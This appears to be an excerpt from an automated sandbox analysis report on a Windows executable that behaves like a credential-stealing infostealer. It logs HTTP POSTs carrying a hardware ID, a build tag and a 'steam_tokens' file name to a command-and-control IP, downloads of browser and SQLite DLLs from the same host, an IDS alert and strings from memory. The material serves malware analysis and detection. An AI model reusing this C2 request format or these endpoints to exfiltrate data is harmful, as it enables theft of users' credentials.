73 0d 0a 2d 2d 2d 2d 2d 2d 43 47 48 44 41 4b 4b 4a 4a 4a 4b 4a 4b 45 43 42 47 43 47 44 2d 2d 0d 0a Data Ascii: ------CGHDAKKJJJKJKECBGCGDContent-Disposition: form-data; name="token"70579c5610e5a8123880d0dba0f7ea421df05d529b432ea2aa4aa02fd98bd86df9a7dfc0------CGHDAKKJJJKJKECBGCGDContent-Disposition: form-data; name="message"files------CGHDAKKJJJKJKECBGCGD--
Source: global traffic HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DHJJEGHIIDAFIDHJDHJEHost: 185.215.113.37Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 44 48 4a 4a 45 47 48 49 49 44 41 46 49 44 48 4a 44 48 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 30 35 37 39 63 35 36 31 30 65 35 61 38 31 32 33 38 38 30 64 30 64 62 61 30 66 37 65 61 34 32 31 64 66 30 35 64 35 32 39 62 34 33 32 65 61 32 61 61 34 61 61 30 32 66 64 39 38 62 64 38 36 64 66 39 61 37 64 66 63 30 0d 0a 2d 2d 2d 2d 2d 2d 44 48 4a 4a 45 47 48 49 49 44 41 46 49 44 48 4a 44 48 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 33 52 6c 59 57 31 66 64 47 39 72 5a 57 35 7a 4c 6e 52 34 64 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 44 48 4a 4a 45 47 48 49 49 44 41 46 49 44 48 4a 44 48 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 44 48 4a 4a 45 47 48 49 49 44 41 46 49 44 48 4a 44 48 4a 45 2d 2d 0d 0a Data Ascii: ------DHJJEGHIIDAFIDHJDHJEContent-Disposition: form-data; name="token"70579c5610e5a8123880d0dba0f7ea421df05d529b432ea2aa4aa02fd98bd86df9a7dfc0------DHJJEGHIIDAFIDHJDHJEContent-Disposition: form-data; name="file_name"c3RlYW1fdG9rZW5zLnR4dA==------DHJJEGHIIDAFIDHJDHJEContent-Disposition: form-data; name="file"------DHJJEGHIIDAFIDHJDHJE--
Source: global traffic HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GIJDGCAEBFIIECAKFHIJHost: 185.215.113.37Content-Length: 272Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 47 49 4a 44 47 43 41 45 42 46 49 49 45 43 41 4b 46 48 49 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 30 35 37 39 63 35 36 31 30 65 35 61 38 31 32 33 38 38 30 64 30 64 62 61 30 66 37 65 61 34 32 31 64 66 30 35 64 35 32 39 62 34 33 32 65 61 32 61 61 34 61 61 30 32 66 64 39 38 62 64 38 36 64 66 39 61 37 64 66 63 30 0d 0a 2d 2d 2d 2d 2d 2d 47 49 4a 44 47 43 41 45 42 46 49 49 45 43 41 4b 46 48 49 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 79 62 6e 63 62 68 79 6c 65 70 6d 65 0d 0a 2d 2d 2d 2d 2d 2d 47 49 4a 44 47 43 41 45 42 46 49 49 45 43 41 4b 46 48 49 4a 2d 2d 0d 0a Data Ascii: ------GIJDGCAEBFIIECAKFHIJContent-Disposition: form-data; name="token"70579c5610e5a8123880d0dba0f7ea421df05d529b432ea2aa4aa02fd98bd86df9a7dfc0------GIJDGCAEBFIIECAKFHIJContent-Disposition: form-data; name="message"ybncbhylepme------GIJDGCAEBFIIECAKFHIJ--
Source: global traffic HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HJJKFBGCFHCGDHIDAAECHost: 185.215.113.37Content-Length: 272Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 48 4a 4a 4b 46 42 47 43 46 48 43 47 44 48 49 44 41 41 45 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 30 35 37 39 63 35 36 31 30 65 35 61 38 31 32 33 38 38 30 64 30 64 62 61 30 66 37 65 61 34 32 31 64 66 30 35 64 35 32 39 62 34 33 32 65 61 32 61 61 34 61 61 30 32 66 64 39 38 62 64 38 36 64 66 39 61 37 64 66 63 30 0d 0a 2d 2d 2d 2d 2d 2d 48 4a 4a 4b 46 42 47 43 46 48 43 47 44 48 49 44 41 41 45 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 6b 6b 6a 71 61 69 61 78 6b 68 62 0d 0a 2d 2d 2d 2d 2d 2d 48 4a 4a 4b 46 42 47 43 46 48 43 47 44 48 49 44 41 41 45 43 2d 2d 0d 0a Data Ascii: ------HJJKFBGCFHCGDHIDAAECContent-Disposition: form-data; name="token"70579c5610e5a8123880d0dba0f7ea421df05d529b432ea2aa4aa02fd98bd86df9a7dfc0------HJJKFBGCFHCGDHIDAAECContent-Disposition: form-data; name="message"wkkjqaiaxkhb------HJJKFBGCFHCGDHIDAAEC--
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 185.215.113.37 185.215.113.37
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL
Suricata IDS alerts with low severity for network traffic
Source: Network traffic Suricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.4:49730 -> 185.215.113.37:80
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00974880 InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,lstrlen,lstrlen,HttpSendRequestA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle, 0_2_00974880
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /0d60be0de163924d/sqlite3.dll HTTP/1.1Host: 185.215.113.37Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /0d60be0de163924d/freebl3.dll HTTP/1.1Host: 185.215.113.37Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /0d60be0de163924d/mozglue.dll HTTP/1.1Host: 185.215.113.37Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /0d60be0de163924d/msvcp140.dll HTTP/1.1Host: 185.215.113.37Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /0d60be0de163924d/nss3.dll HTTP/1.1Host: 185.215.113.37Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /0d60be0de163924d/softokn3.dll HTTP/1.1Host: 185.215.113.37Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /0d60be0de163924d/vcruntime140.dll HTTP/1.1Host: 185.215.113.37Cache-Control: no-cache
Source: unknown HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KJKKJKEHDBGIDGDHCFHIHost: 185.215.113.37Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4b 4a 4b 4b 4a 4b 45 48 44 42 47 49 44 47 44 48 43 46 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 44 39 44 38 37 35 46 32 42 32 31 35 33 32 35 36 34 35 30 37 36 35 0d 0a 2d 2d 2d 2d 2d 2d 4b 4a 4b 4b 4a 4b 45 48 44 42 47 49 44 47 44 48 43 46 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 4b 4a 4b 4b 4a 4b 45 48 44 42 47 49 44 47 44 48 43 46 48 49 2d 2d 0d 0a Data Ascii: ------KJKKJKEHDBGIDGDHCFHIContent-Disposition: form-data; name="hwid"D9D875F2B2153256450765------KJKKJKEHDBGIDGDHCFHIContent-Disposition: form-data; name="build"doma------KJKKJKEHDBGIDGDHCFHI--
Source: file.exe, 00000000.00000002.1932014519.0000000000B3B000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000002.1931818281.000000000082E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.37
Source: file.exe, 00000000.00000002.1931818281.0000000000887000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.37/
Source: file.exe, 00000000.00000002.1931818281.00000000008A6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.37/0d60be0de163924d/freebl3.dll
Source: file.exe, 00000000.00000002.1931818281.00000000008A6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.37/0d60be0de163924d/mozglue.dll
Source: file.exe, 00000000.00000002.1931818281.00000000008A6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.37/0d60be0de163924d/msvcp140.dll
Source: file.exe, 00000000.00000002.1931818281.0000000000873000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.37/0d60be0de163924d/nss3.dll
Source: file.exe, 00000000.00000002.1931818281.0000000000873000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.37/0d60be0de163924d/nss3.dlle
Source: file.exe, 00000000.00000002.1931818281.00000000008A6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.37/0d60be0de163924d/softokn3.dll
Source: file.exe, 00000000.00000002.1931818281.00000000008A6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.37/0d60be0de163924d/softokn3.dll&Q
Source: file.exe, 00000000.00000002.1931818281.00000000008A6000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1931818281.000000000082E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.37/0d60be0de163924d/sqlite3.dll
Source: file.exe, 00000000.00000002.1931818281.0000000000887000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.37/0d60be0de163924d/vcruntime140.dll
Source: file.exe, 00000000.00000002.1931818281.0000000000887000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.37/a
Source: file.exe, 00000000.00000002.1931818281.00000000008A6000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1931818281.0000000000873000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php
Source: file.exe, 00000000.00000002.1931818281.00000000008E6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php.dll
Source: file.exe, 00000000.00000002.1931818281.00000000008E6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php.dll16X
Source: file.exe, 00000000.00000002.1931818281.00000000008E6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php36
Source: file.exe, 00000000.00000002.1931818281.00000000008A6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php4cF
Source: file.exe, 00000000.00000002.1931818281.00000000008E6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpA6
Source: file.exe, 00000000.00000002.1931818281.00000000008A6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpLb
Source: file.exe, 00000000.00000002.1931818281.00000000008A6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpPb
Source: file.exe, 00000000.00000002.1931818281.0000000000873000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpR
Source: file.exe, 00000000.00000002.1931818281.0000000000873000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpZ
Source: file.exe, 00000000.00000002.1931818281.00000000008E6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpl6
Source: file.exe, 00000000.00000002.1931818281.00000000008E6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phplS6
Source: file.exe, 00000000.00000002.1931818281.00000000008A6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phplc
Source: file.exe, 00000000.00000002.1931818281.00000000008A6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpnomi
Source: file.exe, 00000000.00000002.1931818281.00000000008A6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpowsApps
Source: file.exe, 00000000.00000002.1931818281.00000000008A6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phppc
Source: file.exe, 00000000.00000002.1931818281.00000000008A6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpre
Source: file.exe, 00000000.00000002.1931818281.00000000008A6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpser
Source: file.exe, 00000000.00000002.1931818281.00000000008E6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpy6
Source: file.exe, 00000000.00000002.1931818281.000000000082E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.37_S
Source: file.exe, 00000000.00000002.1932014519.0000000000B3B000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: http://185.215.113.37e2b1563c6670f193.phption:
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl07
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0K
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://ocsp.digicert.com0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://ocsp.digicert.com0A
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://ocsp.digicert.com0C
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://ocsp.digicert.com0N
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://ocsp.digicert.com0X
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://www.digicert.com/CPS0
Source: file.exe, file.exe, 00000000.00000002.1958610390.000000006C63D000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr String found in binary or memory: http://www.mozilla.com/en-US/blocklist/
Source: file.exe, 00000000.00000002.1945327275.000000001D252000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1958458408.0000000061ED3000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://www.sqlite.org/copyright.html.
Source: AKFHCAKJ.0.dr String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: file.exe, 00000000.00000002.1955076993.00000000291F2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1931818281.00000000008E6000.00000004.00000020.00020000.00000000.sdmp, BFCFBFBFBKFIDHJKFCAF.0.dr String found in binary or memory: https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.
Source: file.exe, 00000000.00000002.1955076993.00000000291F2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1931818281.00000000008E6000.00000004.00000020.00020000.00000000.sdmp, BFCFBFBFBKFIDHJKFCAF.0.dr String found in binary or memory: https://bridge.lga1.ap01.net/ctp?version=16.0.0&key=1696332238301000001.1&ci=1696332238417.12791&cta
Source: AKFHCAKJ.0.dr String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: AKFHCAKJ.0.dr String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: AKFHCAKJ.0.dr String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: file.exe, 00000000.00000002.1955076993.00000000291F2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1931818281.00000000008E6000.00000004.00000020.00020000.00000000.sdmp, BFCFBFBFBKFIDHJKFCAF.0.dr String found in binary or memory: https://contile-images.services.mozilla.com/0TegrVVRalreHILhR2WvtD_CFzj13HCDcLqqpvXSOuY.10862.jpg
Source: file.exe, 00000000.00000002.1955076993.00000000291F2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1931818281.00000000008E6000.00000004.00000020.00020000.00000000.sdmp, BFCFBFBFBKFIDHJKFCAF.0.dr String found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
Source: AKFHCAKJ.0.dr String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: AKFHCAKJ.0.dr String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: AKFHCAKJ.0.dr String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: BFCFBFBFBKFIDHJKFCAF.0.dr String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4QqmfZfYfQfafZbXfpbWfpbX7ReNxR3UIG8zInwYIFIVs9eYi
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: https://mozilla.org0/
Source: AFHDAKJKFCFBGCBGDHCBAFCAKE.0.dr String found in binary or memory: https://support.mozilla.org
Source: AFHDAKJKFCFBGCBGDHCBAFCAKE.0.dr String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: AFHDAKJKFCFBGCBGDHCBAFCAKE.0.dr String found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.zvXrErQ5GYDF
Source: file.exe, file.exe, 00000000.00000002.1932014519.00000000009CA000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000002.1932014519.0000000000971000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000003.1804973566.000000001D15C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
Source: file.exe, 00000000.00000002.1932014519.00000000009CA000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000002.1932014519.0000000000971000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK201621kbG1nY
Source: file.exe, 00000000.00000002.1932014519.0000000000971000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Ed1aWxkV
Source: file.exe, 00000000.00000002.1932014519.00000000009CA000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000003.1804973566.000000001D15C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
